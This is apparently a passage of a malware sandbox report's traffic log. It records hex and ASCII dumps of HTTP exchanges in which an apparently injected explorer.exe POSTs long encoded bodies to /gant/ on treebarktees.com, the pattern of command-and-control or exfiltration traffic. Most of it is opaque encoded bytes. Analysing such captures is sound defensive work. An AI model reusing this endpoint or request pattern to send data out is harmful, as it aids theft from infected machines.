00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=ewKm7lkt8wgBUIEn0nhz8709bbJmmObTu5kULapAMGsOYtUUt0QFS88ghFrQjJdaqKlCaKfwn0h_r0IDHcuWJnHSzDRmFhIXpV6s9OkDBM4whczmwwtWbIiJJR5R7plh7zqI6zIA96ap5USeW4st~OgFl3JWzaY6tHfLBWeOv3Whj-By0F83UfSpB4ob~s7yuLH5VLja929MalTiJSxUTrr2dDhsBDo7miJTdmIA07gCRtmCwueAXf632WHe0AiXom2pKsXeFx~4(2zNWGC9bOc1ztKqdGAi33tRwN22GK4rR2kUa8H78TZsw73tyfuhfxPDLDWuBC09Fl(j18HNNen3wYOfH5NRQBa6Iw4aaLgAmgPJrCbQIwnIb1bqU40oBhWPzRsn6GIgP4Zw562vIKw8uUiWWM78kcRbP7fxnm3QkAQ-~vqgwvhHLqIHWUq3d-f_XxPw92IatzD2Xq4aeISbr2VEc6BK7_5oLzHFrnscA9U9r8Wr6PelU9APLd1joUqGb6M.
                                                                                                                  Feb 13, 2023 19:05:15.334814072 CET1348INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Mon, 13 Feb 2023 18:05:15 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  x-powered-by: PHP/8.1.15
                                                                                                                  x-litespeed-tag: 90d_HTTP.404
                                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                  link: <https://treebarktees.com/index.php/wp-json/>; rel="https://api.w.org/"
                                                                                                                  x-litespeed-cache-control: no-cache
                                                                                                                  content-encoding: gzip
                                                                                                                  vary: Accept-Encoding
                                                                                                                  Data Raw: 31 34 62 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 93 e3 b6 b1 e8 e7 9d aa fc 07 98 5b de 19 25 24 45 f0 25 4a f3 f0 49 d6 ce b1 ab ec 24 95 75 7c ea 56 d6 35 05 91 90 c4 5d 8a 64 48 6a 34 e3 39 53 75 ff c6 fd 7b f7 97 dc ea 06 48 82 12 f5 98 57 ee c9 63 13 ef 52 24 d0 dd 68 34 1a 8d 46 a3 71 f1 c5 d7 7f 7c ff e3 ff fa d3 37 64 51 2d 93 ab 93 0b f8 87 24 2c 9d 5f 6a 3c 35 fe f2 41 83 77 9c 45 57 27 6f 2e 96 bc 62 24 5c b0 a2 e4 d5 a5 f6 97 1f 7f 6f 04 1a 19 36 5f 52 b6 e4 97 da 4d cc d7 79 56 54 1a 09 b3 b4 e2 69 75 a9 ad e3 a8 5a 5c 46 fc 26 0e b9 81 3f 74 12 a7 71 15 b3 c4 28 43 96 f0 4b 8a 70 88 fc 73 51 56 77 09 bf 3a a9 7f c3 bf e6 3a cb a7 46 b9 66 55 b8 20 f7 9d 4f f0 79 19 a7 02 f2 84 d8 5e 7e 7b de 5b 60 c1 e3 f9 a2 ea 2b f1 d0 29 df c1 15 2f e7 3d f8 b0 15 7d 90 80 98 63 f0 5c 0c 65 23 4f 04 5b 91 79 a7 45 36 cd aa f2 b4 61 dd e9 92 dd 1a f1 92 cd b9 91 17 1c 58 3b 49 58 31 e7 a7 c0 f6 8b 2a ae 12 7e f5 27 36 e7 24 cd 2a 32 cb 56 69 44 de bd 0d 6c 4a cf c9 8f 05 e7 53 56 7c be 18 8a 62 27 17 49 9c 7e 26 05 4f 2e 4f a3 b4 04 78 33 5e 85 8b 53 b2 28 f8 ec f2 74 38 ac 64 8d 8a f3 d2 0c b3 a5 40 d2 d4 d2 58 52 f1 22 65 15 d7 48 75 97 f3 4b 8d e5 79 12 87 ac 8a b3 74 58 94 e5 6f 6e 97 89 46 10 db a5 56 a3 27 ef 0a f6 b7 55 76 4e 7e cf 79 a4 09 5c da a2 aa f2 72 b2 8d 71 18 a7 11 bf 35 f3 45 3e 9c 71 1e 0d 51 2a 5a ba 9f 49 c1 fb 6c b9 e4 69 55 3e 96 94 50 d6 53 69 2a c3 22 ce ab ab 93 75 9c 46 d9 da bc 5e e7 7c 99 7d 8a 3f f0 aa 8a d3 79 49 2e c9 bd 36 65 25 ff 4b 91 68 13 d9 de 8f c3 8f c3 d2 5c 9b 59 31 ff 38 c4 4e 2d 3f 0e c3 ac e0 1f 87 58 f9 e3 90 ba a6 65 5a 1f 87 23 fb 76 64 7f 1c 6a ba c6 6f 2b 6d a2 99 79 3a d7 74 ad bc 99 3f 0d 5e 79 33 47 68 e5 cd fc 1b 01 b0 bc 41 80 d9 aa 08 b9 36 b9 d7 c2 2c 0d 59 85 64 48 7a 27 40 ee a6 48 7c 1c ae 73 23 4e c3 64 15 f1 f2 e3 f0 53 89 2f b0 9a 51 f0 84 b3 92 9b cb 38 35 3f 95 5f dd f0 e2 d2 37 a9 49 b5 87 87 f3 93 e1 af bf 20 3f 2e e2 92 cc e2 84 93 b8 24 6c 55 65 c6 9c a7 bc 60 15 8f c8 af 87 27 5f cc 56 69 08 b2 74 c6 75 a6 57 83 fb 1b 56 90 54 2f f4 4c 8f 2f 99 19 16 9c 55 fc 9b 84 43 1f 9e 69 21 4b 6f 58 a9 0d f4 fc 32 36 e7 bc 7a 0f ca e6 b6 7a f7 4e fd 75 a6 d9 91 36 38 af 01 93 f2 8c d7 80 d9 e5 87 aa 88 d3 b9 39 2b b2 e5 fb 05 2b de 67 11 d7 f9 e5 59 6e 86 09 67 c5 9f 79 58 9d 59 ba a5 c7 a6 d0 58 b1 29 86 f5 40 cf cd 59 9c 24 3f f2 db ea 8c 99 30 06 ee ce aa 45 5c ea 7c a0 5b ba 35 d0 63 b3 ca be 66 15 fb cb 9f bf
                                                                                                                  Data Ascii: 14b8}k[%$E%JI$u|V5]dHj49Su{HWcR$h4Fq|7dQ-$,_j<5AwEW'o.b$\o6_RMyVTiuZ\F&?tq(CKpsQVw::FfU Oy^~{[`+)/=}c\e#O[yE6aX;IX1*~'6$*2ViDlJSV|b'I~&O.Ox3^S(t8d@XR"eHuKytXonFV'UvN~y\rq5E>qQ*ZIliU>PSi*"uF^|}?yI.6e%Kh\Y18N-?XeZ#vdjo+my:t?^y3GhA6,YdHz'@H|s#NdS/Q85?_7I ?.$lUe`'_VituWVT/L/UCi!KoX26zzNu689++gYngyXYX)@Y$?0E\|[5cf
                                                                                                                  Feb 13, 2023 19:05:15.334908962 CET1349INData Raw: 3f 1b 0c ce 0b 5e ad 8a 94 3c 1d 6e 25 e1 f2 cb cb cb 0e ec 87 a6 61 e1 19 17 fc aa b6 39 25 44 55 1b 9c 57 66 59 84 97 5c af cc 88 cf 78 71 59 99 62 18 03 df 86 9f d8 0d 93 25 75 06 0c 95 9c 2e 7f 77 f7 23 9b ff 81 2d f9 99 06 f3 80 36 f8 ab f5
                                                                                                                  Data Ascii: ?^<n%a9%DUWfY\xqYb%u.w#-63EDgagoilYYr{~j6yLx:o~3h5ku,Apq'q/*5&%cEM\?Vq0
                                                                                                                  Feb 13, 2023 19:05:15.334980011 CET1350INData Raw: dc b7 2c a9 09 6b 11 a4 59 17 c5 83 22 f0 b2 b4 c9 0a 6e d4 f3 53 72 27 66 28 1e 19 55 96 df ab 04 21 d0 b2 62 45 75 3c 8c 90 a7 15 2f 3a 60 c4 ab e3 41 08 86 76 40 20 25 3c 8d 5a 96 b0 5b e9 0b 1b 05 b4 97 25 42 32 e2 d2 48 b3 ca 28 2b 16 7e e6
                                                                                                                  Data Ascii: ,kY"nSr'f(U!bEu</:`Av@ %<Z[%B2H(+~2\mqLYjY_*bm<p:9X-!&"[O68}gFD`.nzHk^h@5[*m`YQ)=oGuLIs~$F)x-y2;t(1>wA?
                                                                                                                  Feb 13, 2023 19:05:15.335042953 CET1352INData Raw: ba 1e f0 cd 8e 06 86 b7 9d 51 93 0e fa 2b 08 a5 21 37 5c 5a f1 55 e7 94 f6 ad c1 d2 70 91 15 3b 44 bb bf 4e ff 5b 09 69 c2 c2 2a be e1 2f 08 10 15 de 0b c2 bb 89 61 06 8a 5e 0e 22 2e 53 c4 7a ac b3 0c d9 5a 98 ec e8 af c6 d3 88 fe 0a 23 c9 e6 59
                                                                                                                  Data Ascii: Q+!7\ZUp;DN[i*/a^".SzZ#Y6`S'YsFb%%KpD,B{PQ2!Af(0xH9"0XA_l/iJ>v`|4k6{Qd*z0\/^Vg,,F~v
                                                                                                                  Feb 13, 2023 19:05:15.336524010 CET1353INData Raw: 87 59 74 55 70 0f a6 16 5a c1 13 06 21 30 af 42 f7 1c 02 a5 78 da e3 83 c6 60 a6 9c 41 14 fc ab 60 8e e2 a5 61 dd 67 39 0b e3 ea 6e a2 4e c0 3d dc 78 7a af 18 b4 45 62 aa c7 f2 5e 16 8b ad 60 b1 5f 8d 5f 8e 82 c5 79 35 2c ae 82 45 0d ff 79 59 8e
                                                                                                                  Data Ascii: YtUpZ!0Bx`A`ag9nN=xzEb^`__y5,EyYy+XTe`Z[KjXaV3!%L3xP&A9b`kC!9_dt5WjyjM(_MTA4=qf<K8w1I6ELI
                                                                                                                  Feb 13, 2023 19:05:15.336617947 CET1354INData Raw: ff 79 70 af 0e 84 ae 5b fe 61 16 cf 57 05 6f 16 ba c4 02 ff 42 ff 12 64 9e 64 53 b8 f2 00 16 fe 1b 47 de a7 59 74 27 96 1f 8d b1 8a 52 6b 18 d3 84 85 9f 27 04 62 93 21 ea b5 37 ff 66 6d bd c5 c2 c0 ba 9b 90 b7 6c 3a 0d 42 a7 bf f8 7a 11 57 7c 42
                                                                                                                  Data Ascii: yp[aWoBddSGYt'Rk'b!7fml:BzW|BO%PFAb<a><6qJiofE|H:l9ogtwitMp*W91~)5Gt04JSyB;:Zg$SN[yY]!8
                                                                                                                  Feb 13, 2023 19:05:15.336687088 CET1356INData Raw: 54 57 2e 54 12 ba 7a e6 20 2b 14 1d 83 5b 23 5d d6 cd 59 6e 18 70 91 27 40 05 93 6c 8b b9 58 62 91 15 f1 2f 10 5b 95 4c 30 56 0d ba 5c 87 5b 90 36 b5 0d 96 ae 43 b6 0f 94 4d 18 9c 9b 86 4b 96 f0 1e 5d 79 b5 92 63 41 b0 d4 46 b3 ea a2 10 91 bd af
                                                                                                                  Data Ascii: TW.Tz +[#]Ynp'@lXb/[L0V\[6CMK]ycAF\#oF|hH[;L2?T'Y!\k^=J`$LVGUj5%J0z3fVITNH5O$D$%6_j?r@l{Jd7WR'w=Mu.H.fdAp
                                                                                                                  Feb 13, 2023 19:05:15.336750984 CET1357INData Raw: 98 99 9e 00 f5 c8 19 e9 09 90 c5 18 7f d4 4c f4 04 2c 1b 13 81 58 7d f4 f0 7d a3 9c 9c 81 9e 8f f0 f8 99 e7 29 b8 9e 32 e3 3c 01 cf 13 66 9a 27 60 79 fc 0c f3 04 24 8f 9d 59 9e 8c 62 ff 8c f2 04 b0 7b 66 92 27 40 db 3b 83 3c 05 de de 99 e3 09 00
                                                                                                                  Data Ascii: L,X}})2<f'`y$Yb{f'@;<O?SlC{KAvR$}IS>-1[rA6}qYCy.zoM6Ot|/I^8,CUgg'ilujP=[=UR&2d`zpt=OT
                                                                                                                  Feb 13, 2023 19:05:15.336834908 CET1358INData Raw: eb 99 14 df b0 22 46 8f 97 51 ae 59 15 2e 78 f9 0a a4 37 48 ae 6b 24 d8 86 ed d7 cf 6c cc 3a 2e 17 ed dd 3f 8f 5c f9 ec 97 95 1a b4 70 27 48 3c 4f 27 f7 6f c9 9a e5 f9 13 29 5c e7 46 7d 75 a6 11 2e 58 35 9c ae e2 24 1a ce 0a 4c 64 11 21 89 b8 20
                                                                                                                  Data Ascii: "FQY.x7Hk$l:.?\p'H<O'o)\F}u.X5$Ld! jM=+Tw9IV-hzh>^/5eEx,I*f6k$yxxFQ("y/pr8abX-b(Z~c8J%+|p9NE\H\IpVr.
                                                                                                                  Feb 13, 2023 19:05:15.336913109 CET1358INData Raw: a1 fb 25 dd 6b 4c 20 d7 a3 20 e8 bb c0 fc 0d 0a
                                                                                                                  Data Ascii: %kL
                                                                                                                  Feb 13, 2023 19:05:15.495265007 CET1360INData Raw: 62 35 30 0d 0a 5b d0 5f 4f d0 eb 30 f4 7f 59 41 b7 14 79 dd 6f a3 58 66 ab 98 61 02 50 2a ee 15 f4 ce 58 fa b7 2c bf a2 2c 77 6e d5 f9 57 95 68 73 a4 ae 2e bd 8e f4 1d 12 f0 71 c7 dc 39 56 c0 cd c6 20 02 c3 65 0c 2b dc da 80 81 71 a2 ce 08 ff 16
                                                                                                                  Data Ascii: b50[_O0YAyoXfaP*X,,wnWhs.q9V e+q,(xW@Wvrsn}pQ^kY t"rCWB=uKm]o{F<JB{':#Y[<v1i/1e@nNnLy<%-FL69


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  58192.168.11.2049913103.191.208.5080C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:05:17.108081102 CET1373OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.treebarktees.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 51816
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.treebarktees.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.treebarktees.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 65 77 4b 6d 37 6c 6b 74 38 77 67 42 55 49 45 6e 30 6e 68 7a 38 37 30 39 62 62 4a 6d 6d 4f 62 54 75 35 6b 55 4c 61 70 41 4d 47 6b 4f 5a 63 30 55 73 56 51 46 41 73 38 67 76 6c 72 72 6a 4a 64 4c 71 4b 39 47 61 4b 54 4f 6e 32 5a 5f 71 6e 77 44 41 75 57 57 4d 6e 48 52 76 54 52 6b 58 52 49 44 70 56 32 34 39 4b 45 31 41 38 6b 77 67 66 72 6d 30 44 30 41 52 34 69 4c 4a 52 35 56 73 35 6c 70 37 7a 75 59 36 7a 4d 41 39 35 7e 70 34 6d 71 65 58 70 73 74 7a 2d 67 45 77 48 49 57 71 4b 59 66 74 48 69 76 42 57 66 31 76 32 69 68 6a 39 35 79 31 47 55 30 55 5f 53 70 66 49 6f 61 30 4d 33 32 75 4c 4c 78 56 4c 6e 61 39 77 35 4d 63 31 54 69 4d 7a 78 54 61 72 72 34 5a 44 68 37 46 44 55 4e 6d 6d 67 71 64 6e 63 41 31 4c 30 43 51 65 7e 43 32 50 65 41 4a 50 36 69 79 57 48 33 37 67 69 31 6f 6d 48 36 4b 6f 6a 52 46 7a 79 34 28 55 37 4e 45 33 43 38 64 75 63 5f 32 74 4b 46 4b 57 63 51 33 32 42 37 77 4e 33 74 47 4c 38 72 52 47 55 55 49 39 48 34 37 44 59 6d 38 62 32 6e 38 5f 69 6e 66 77 6e 4c 4c 44 65 45 42 44 77 39 45 46 28 6a 77 66 76 43 43 65 6d 5f 79 59 50 61 4a 5a 4e 4b 51 42 65 63 49 78 74 76 61 62 63 41 6d 51 66 4a 76 53 62 54 4e 51 6e 4d 52 56 61 68 46 6f 30 6f 42 68 72 30 7a 52 77 6e 36 7a 6b 67 42 76 6c 77 79 4c 32 76 62 61 77 2d 75 55 69 6c 57 4e 47 4d 6b 63 59 34 50 5f 6a 50 6e 67 48 51 39 31 30 2d 79 4f 71 68 31 66 68 43 63 4b 49 51 59 30 33 33 64 2d 43 7a 58 78 65 4e 39 45 4d 61 73 79 7a 32 41 36 34 5a 59 6f 53 63 73 32 56 6f 59 36 45 54 37 5f 30 64 4c 77 62 73 72 6e 55 63 43 70 5a 34 75 6f 44 7a 75 76 47 76 5a 36 63 30 4a 4b 4d 76 7a 6b 6d 75 61 38 6e 31 55 78 62 68 57 45 6b 73 7e 69 34 36 57 47 78 47 61 54 53 42 47 68 31 65 48 4c 37 32 30 45 78 6c 6d 30 71 45 64 7a 76 57 65 4f 67 4f 65 37 70 6d 73 31 4f 39 75 6e 57 44 35 6d 70 65 44 36 58 6c 62 31 79 4a 51 42 49 66 4b 4e 63 78 47 73 69 31 61 78 4c 73 5a 4d 6f 5f 50 61 41 33 4b 4b 55 36 6d 7a 32 69 4c 41 77 79 38 63 7a 31 6e 6e 67 4e 48 78 31 75 4d 38 6b 39 67 5f 5a 72 46 56 71 72 6c 33 65 30 4a 77 63 4b 34 49 72 39 4a 77 52 78 33 35 4b 65 42 4c 7e 6b 77 77 36 34 4d 48 70 46 51 5f 6e 36 6f 37 37 44 49 41 77 77 47 34 61 77 76 51 52 59 35 54 31 6b 7a 76 38 61 43 52 6d 4b 63 6d 71 31 71 71 6f 6d 6c 53 61 70 72 53 64 6e 6d 64 64 6c 5a 34 46 4e 71 79 45 78 35 7a 74 4a 55 6e 32 32 7e 4e 52 44 46 5f 78 61 70 6c 65 47 63 51 66 34 31 4a 32 4f 4c 4b 56 49 6c 49 4d 32 4d 79 62 72 7e 78 56 37 56 4c 55 78 39 53 33 34 77 46 4e 34 6e 52 47 5f 50 4e 48 77 4a 36 70 71 66 55 54 44 30 34 4e 70 74 6a 36 39 52 62 31 6a 62 65 68 6a 39 66 79 31 32 57 6a 4c 6a 51 58 37 28 66 62 4a 38 74 62 4c 50 32 78 68 63 39 70 69 54 42 6b 65 54 6d 37 35 56 72 28 33 33 67 35 38 67 6a 69 66 4a 51 56 46 51 58 62 4b 43 6f 63 68 54 47 72 5f 68 65 69 66 37 46 53 45 58 47 6c 48 32 45 41 6c 7a 72 77 70 76 70 35 47 41 70 46 31 6e 4e 31 64 69 79 35 7a 44 2d 71 64 65 7a 65 51 76 6f 46 79 47 48 61 56 56 53 72 4c 59 30 4a 78 54 31 31 33 47 59 35 77 71 7a 28 36 52 45 49 70 68 73 36 77 62 78 51 54 57 75 41 68 79 73 47 72 5a 41 47 45 6a 42 69 65 65 49 6a 6c 79 55 75 48 6f 59 4b 49 69 77 44 59 79 68 6d 49 31 5a 28 69 6a 42 70 67 44 75 76 4a 28 75 54 6e 4c 57 76 4d 71 53 30 6a 66 48 68 4a 37 52 64 58 62 6f 50 59 5a 38 7a 30 37 52 74 66 73 73 36 46 67 52 75 75 71 76 39 31 6d 32 32 4a 4d 61 45 49 50 50 6c 66 79 4f 6f 6c 5a 78 37 31 44 74 6b 65 62 55 68 76 61 41 5a 61 30 45 39 56 6c 45 28 73 77 43 37 47 68 45 49 7a 6e 76 63 66 67 70 56 6f 61 7a 67 39 61 65 4c 56 4a 42 48 57 54 31 64 79 71 71 4b 35 34 42 6e 4d 4d 34 6e 54 4f 69 78 66 39 50 39 55 46 65 59 58 42 71 45 52 35 69 56 52 49 32 65 46 71 46 6c 38 72 59 71 36 65 54 58 58 69 70 55 54 56 4a 49 56 4a 67 48 76 46 53 33 6b 37 69 6b 6a 43 4f 50 5f 79 35 4e 76 4e 4c 68 45 32 74 78 79 46 47 79 41 44 69 51 6c 49 32 48 53 58 2d 79 72 7e 4f 42 5f 49 64 57 36 54 78 6a 35 4f 35 69 64 4b 31 4c 52 73 32 6a 51 5a 56 7a 64 28 46 65 62 7a 43 62 6d 78 72 57 32 65 47 70 59 54 61 68 34 67 71 31 7a 69 6a 6c 51 52 55 7a 6e 59 62 28 47 75 45 45 4e 71 34 63 6e 59 30 51 7a 69 5a 71 58 76 62 70 33 70 53 6b 48 4c 76 35 68 54 69 6f 45 76 61 53 37 73 55 4c 41 50 68 68 53 55 72 36 5a 56 34 48 32
                                                                                                                  Data Ascii: j-Jh9P=ewKm7lkt8wgBUIEn0nhz8709bbJmmObTu5kULapAMGkOZc0UsVQFAs8gvlrrjJdLqK9GaKTOn2Z_qnwDAuWWMnHRvTRkXRIDpV249KE1A8kwgfrm0D0AR4iLJR5Vs5lp7zuY6zMA95~p4mqeXpstz-gEwHIWqKYftHivBWf1v2ihj95y1GU0U_SpfIoa0M32uLLxVLna9w5Mc1TiMzxTarr4ZDh7FDUNmmgqdncA1L0CQe~C2PeAJP6iyWH37gi1omH6KojRFzy4(U7NE3C8duc_2tKFKWcQ32B7wN3tGL8rRGUUI9H47DYm8b2n8_infwnLLDeEBDw9EF(jwfvCCem_yYPaJZNKQBecIxtvabcAmQfJvSbTNQnMRVahFo0oBhr0zRwn6zkgBvlwyL2vbaw-uUilWNGMkcY4P_jPngHQ910-yOqh1fhCcKIQY033d-CzXxeN9EMasyz2A64ZYoScs2VoY6ET7_0dLwbsrnUcCpZ4uoDzuvGvZ6c0JKMvzkmua8n1UxbhWEks~i46WGxGaTSBGh1eHL720Exlm0qEdzvWeOgOe7pms1O9unWD5mpeD6Xlb1yJQBIfKNcxGsi1axLsZMo_PaA3KKU6mz2iLAwy8cz1nngNHx1uM8k9g_ZrFVqrl3e0JwcK4Ir9JwRx35KeBL~kww64MHpFQ_n6o77DIAwwG4awvQRY5T1kzv8aCRmKcmq1qqomlSaprSdnmddlZ4FNqyEx5ztJUn22~NRDF_xapleGcQf41J2OLKVIlIM2Mybr~xV7VLUx9S34wFN4nRG_PNHwJ6pqfUTD04Nptj69Rb1jbehj9fy12WjLjQX7(fbJ8tbLP2xhc9piTBkeTm75Vr(33g58gjifJQVFQXbKCochTGr_heif7FSEXGlH2EAlzrwpvp5GApF1nN1diy5zD-qdezeQvoFyGHaVVSrLY0JxT113GY5wqz(6REIphs6wbxQTWuAhysGrZAGEjBieeIjlyUuHoYKIiwDYyhmI1Z(ijBpgDuvJ(uTnLWvMqS0jfHhJ7RdXboPYZ8z07Rtfss6FgRuuqv91m22JMaEIPPlfyOolZx71DtkebUhvaAZa0E9VlE(swC7GhEIznvcfgpVoazg9aeLVJBHWT1dyqqK54BnMM4nTOixf9P9UFeYXBqER5iVRI2eFqFl8rYq6eTXXipUTVJIVJgHvFS3k7ikjCOP_y5NvNLhE2txyFGyADiQlI2HSX-yr~OB_IdW6Txj5O5idK1LRs2jQZVzd(FebzCbmxrW2eGpYTah4gq1zijlQRUznYb(GuEENq4cnY0QziZqXvbp3pSkHLv5hTioEvaS7sULAPhhSUr6ZV4H2JURmTV2QmBEEprSqDuBlyaXbRhJLXwcztP4t3iACUycyO_kHkaOyeeYFApvOBiQ4trCy04JlgnbHAhWhV8zF3IwYSNntzVCn68IKCumcvmx88-B2b7P2kaIaM7M-LCcXmGHg3KXHoDtIcvHZ28P1cVBTpAxqNXYtrv9X2xctsGi50jdj8ednob~1cu0gQuXi8qVOSUWLuu0q1rx_xnwg~8oV2ubID-OnLysVLokGyFsWeXywzALH4u4VcEesCpgb8oNfcPeGnm(UrwLA1adFnNSyb5mvvMg7Z3VAgwEF2zQ1kNHi0NPEi-OQY711phc2Ah0HPLpznh4mOfA8ADoNmf53wxxdQ9wS2Bt5fBXrmt3enkekF9iE1UNaEr(VCKO1JLE7aN9EL4xQMoeeioW8wc8i8rEG5J6ZvQqzCjQk86SzBBafzmOP8UuASzXOpCy3Fr6uhc~Q0aDdMxEivV8X6kuMmE7YnPyRC7Stj7JLM4C-2Z2n9qfMKbO1No(6oMjV80SXyU3KYlpCij46kYFjeBZzKrUJYb(N69QWP9WYd_FLZW~hHGyyM54d0_d7fhmfajARRf5Hsq~2ixZbrYXD9Pbt4zbqwoC0EelhNxyUuBDRSITspXK7pGYZ84Ko4E4oBPG3ZnkcL1OLPmUdlpUdhJ15A942RZam5f6HFWYPqLLDIaagd3j5Y8454W39O8BwIGEDYBZgnAE4QI9nGecc2UZxabPZ~Vm1hBo_cbfQalOsp2C5(nvl~dwTLiN4iYTQV3Yut1XrBRoXKZWiSeybL9JhWi7YaaTN8Db_2lVlfaiW0Uj2euYWWxzyBOH9cN~1R3adoo(kvwJ85wQT4TxV0t0lvu4APMorujAKyKTZMYdCJCdU~WwgD55Y0tkMc44cCGTFXZ6nDSUHhl0VuCn28TVthVZoVhqvIl6X89vZkFAIH4bq5j6uAhNz9Wa72QvVVZzO32AJDempmv0MjaPJV0(eD-XVZqpItJXCjOPx25P49LapFRCQn-o4(Zp-uQ(_975RzsAU5vDOMdenicwkd6ZPjpzl17iO84n_uSjCPyDeQUyOikUx1s98BEBEOTarGkijNjZG(gVUz6JiDtyNpFM21XWQCK6iKjonoUjRsddpPjvmTNGaXixZlWIAGYhFOqu196TcfoAoNBjOkQgvoyDn4HraJIUJIOg8IIAcs8tpfmA3tfANJwum5IWNF5w5D0jdr7Dn~4HsQduZF4B6Lm0xhiRK7jDpCwOyR1YZO2BpFljvLZmIqzWQkPbJ4bWhm2imMU7_23y6v1dJp_G07JOIZa7QEmSwqVrLxlJHDOoc2vC9V_ik13CWNv(I7k47CqvPb49kt8qg76xQ98C2B58rZfpBZhXOqlsuDUR83qcac461xokF5zaVfT5cgpgVn_ufZYPFBiTQny2qzNyFJEwwHrH8QbBwzSMPXKlciDrp6ifmEfkz35HZ6EE39PUFP4XWdE8tzMeIaYijDwTclwLrEio-5AJgpi(Y5elxG2sNH3Z_gNgcEMy1NKUpNdvj4S4Kn940ShcqEsnzFrT0TaXxjEZwvT(Jgs9p0ZhaEs3KVWzdlFnXGDkCaZTUxHz8XMO3VsYwis9bJHX6LZiSxMrLHI9-6VHjPOhbKzQ4xTXUKuABS9r2hyyKi_N7imQ-QvOWR_BcVOEWI8URbxu4wxPiiQ6Q3MkNn-j_YBKsyI5G7fq1fAUwXyXzhOJ462GY(hT4ARGWDEmsZ5xqLWG3ZZI197IYMUTfqyCIkQmm2UYkpvuQnCUqTwZ5OYZ8JKWYORB4U8ckQo1j3_MQaxHksvw2xaaYS1jo1m~sMbRRxCB1NlY_OjiFObPBxSYyla40jAMmVkScBiBdQ9CRTiXnX8FTBLEkXLeHQwpVsH6kSduG6tS75ybXkNNm00JKVHyGVS7UXznDg4qSBV9rpyxmFp1_bwBECjBB5ebdPyJQYt1NhskAIAP84MBK4pvMH_jzAN63OmbPiAluc0ctFsJ88ocb0cGyaQgybspxknBp13aJH_RDjhZjQC8XSdWt6EMs4PeRmltMWAcdmbZmSuPzHahaHYl5MT2nheYAo25MTgCWqNNXaxMHd07ZVPYY0Jr_G7UafRrD1ADDiCceLAdCVY~LbXtwSpu1LuV9N6tZw8sPIezYOe10EloEHmopeyPWLnTdJNlBd5yD7eskqCtJ5N4-OwD9PZj1t1lTtqFbyBKA0dD1w5DkJzMS4BB6fhTY(t(26NTW4kgHT4(Q0QOGF6FZ0z8_oB~7w5f-UuMBpmEknxi2(H5ebZuMzYKe24COC6O8lJ31kir0OO1KtA5wrqgvOpMDzKoO4fFaIQ58GVBS3rdFuo4EBQjky5H50L9PKEgy1_eL5tLTrXOp~F1jNbpFQEJPLhWbYQ0aVocM5EB3d8eIF4sKCX5LaINkkYc8ZMhIDtbxYImA(UFIcA5Ua7dqZ-bHcZM0G3phYM2hmcZWQ_HhhGHFm_n02HIeRiSpYUZl3C376lCLjnZpRBDuqGqOhtsO48srpceO5eBk6MfmkQS0oQ3fxVuSB5XGQ_CnGP6S~wGMg8vglh~HaY9DnVKNnK3qnvw1KTMVirM-0OKoExfT3_kRbTgO(lbbQ3JRnPVxAN7ItVGKJ-2lnV0dVpock_IP4Oc8VfZ_hk5pMjEVNA73fQ4xe4mu58CMu8QDJu2BJw673H4IlujK3LvaGpo0GRu-GUUGS4t
                                                                                                                  Feb 13, 2023 19:05:17.108122110 CET1378OUTData Raw: 36 5a 61 7a 41 72 78 55 38 58 64 53 6c 33 33 54 69 72 38 54 73 76 47 4d 65 52 4f 4e 77 28 75 35 51 48 34 28 57 79 38 79 5a 6a 4f 61 33 32 74 30 44 28 35 63 4e 64 70 67 67 44 69 73 32 71 75 67 73 71 4b 76 65 4a 56 66 4e 36 34 56 77 51 63 48 75 4d
                                                                                                                  Data Ascii: 6ZazArxU8XdSl33Tir8TsvGMeRONw(u5QH4(Wy8yZjOa32t0D(5cNdpggDis2qugsqKveJVfN64VwQcHuMR6nXXvtVojnSUjln8LZ0eAh9PzKznBZMEstJ8oAJ5hTtS35eAFq8xIUdoQLicudfeLcvOqeUwG_OZ2Du-zEQppbeMzjcje92ONhxGOU80R-p4MozfEb6or2t_VSpdakgbjtww0_0cYFTq632lW0rcpe8gvgiEerK6
                                                                                                                  Feb 13, 2023 19:05:17.279903889 CET1390OUTData Raw: 41 76 75 79 6a 62 4b 33 70 44 4f 28 77 68 45 71 77 4c 56 32 37 4e 76 37 71 50 6a 45 38 55 57 47 50 48 6f 69 49 72 6c 69 6c 58 4e 42 45 55 4a 7a 6b 30 30 4e 55 4c 4a 68 77 67 6b 43 59 47 73 63 56 28 55 59 43 66 64 48 77 48 61 68 54 65 55 6b 70 44
                                                                                                                  Data Ascii: AvuyjbK3pDO(whEqwLV27Nv7qPjE8UWGPHoiIrlilXNBEUJzk00NULJhwgkCYGscV(UYCfdHwHahTeUkpDzUSK8G9mDVlJBAvbrAQvw3q3VhNeHOucdATY1UECnVuj18L1f3IKpswjMd_YctCmHigUf9M586ZEJrmnoOMPrDFm2YFLSOKZrfqwXafesKnD6fc~KKY6xOgILuEde8UvsKv074kljxoxWC2g4n_iZ0-k1O5(0tXWH
                                                                                                                  Feb 13, 2023 19:05:17.280038118 CET1406OUTData Raw: 70 32 4b 57 62 74 4a 46 6b 6d 6c 34 41 28 43 64 55 73 41 4e 2d 49 71 28 33 63 6e 63 68 7e 30 4e 55 43 49 7e 68 54 73 59 5f 4d 42 4f 6f 34 4c 4b 77 43 46 45 41 4b 68 6b 38 75 68 30 53 4a 78 46 52 4d 69 33 76 37 7a 52 75 66 42 75 63 32 6d 6c 56 61
